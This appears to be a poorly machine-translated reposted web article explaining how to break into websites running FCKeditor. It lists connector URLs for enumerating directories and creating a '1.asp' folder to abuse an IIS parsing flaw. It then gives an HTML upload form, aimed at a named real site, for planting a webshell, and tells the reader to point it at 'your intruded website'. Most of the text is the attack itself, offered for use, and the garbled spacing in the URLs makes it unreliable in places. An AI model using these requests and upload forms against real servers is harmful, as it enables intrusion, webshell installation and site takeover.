How does FCKeditor Delete All upload pages?

Source: Internet
Author: User

First, you must determine the FCKeditor version.

 

/FCKeditor/Editor/dialog/fck_about.html

 

Secondly, are you sure you have deleted the following upload pages?

 

/FCKeditor/Editor/filemanager/Browser/default/browser.html

/FCKeditor/Editor/filemanager/Browser/default/connectors/test.html

/FCKeditor/Editor/filemanager/upload/test.html

/FCKeditor/Editor/filemanager/connectors/test.html

/FCKeditor/Editor/filemanager/connectors/uploadtest.html

 

Well, all of them have been deleted. It's so unfortunate. What should I do? Are you sure you have any of these files?

 

/FCKeditor/Editor/filemanager/connectors/aspx/connector. aspx

/FCKeditor/Editor/filemanager/connectors/asp/connector. asp

/FCKeditor/Editor/filemanager/connectors/PHP/connector. php

 

If it exists, that's great. You can continue reading it. Here we take aspx as an example.

 

1. view the files in the media directory:

 

/FCKeditor/Editor/filemanager/connectors/aspx/connector. aspx? Command = getfoldersandfiles & type = Media & CurrentFolder = % 2f

 

Red media can be changed to file or image, and the corresponding file or image directory is entered.

 

2. Use the IIS resolution vulnerability to create a special ASP Directory

 

FCKeditor/Editor/filemanager/connectors/aspx/connector. aspx? Command = createfolder & type = Media & CurrentFolder = % 2f & newfoldername = 1.asp

 

The corresponding media directory is red, and the special directory name is blue.

 

3. Create a form and upload webshell to a special directory.

 

<Form ID = "frmupload" enctype = "multipart/form-data" action = "http://www.itatpro.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx? Command = fileupload & type = Media & CurrentFolder = % 2fasp. asp "method =" Post ">

Upload a new file: <br>

<Input type = "file" name = "newfile" size = "50"> <br>

<Input id = "btnupload" type = "Submit" value = "Upload">

</Form>

 

Save the above representation as HTML format, the http://www.xxx.com is modified to your intruded website address, type = media is the corresponding Media Directory, 1. asp is a special directory name.

 

Last tips

 

You need to find the uploaded path in the code in the upload form. Of course, its rendering method is an uploaded file name, and the full path must be combined by yourself, I believe you will. If the access fails, upload a correct image and try again. If the access succeeds, the Administrator has completed the IIS path parsing vulnerability, and you have to find another way out.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.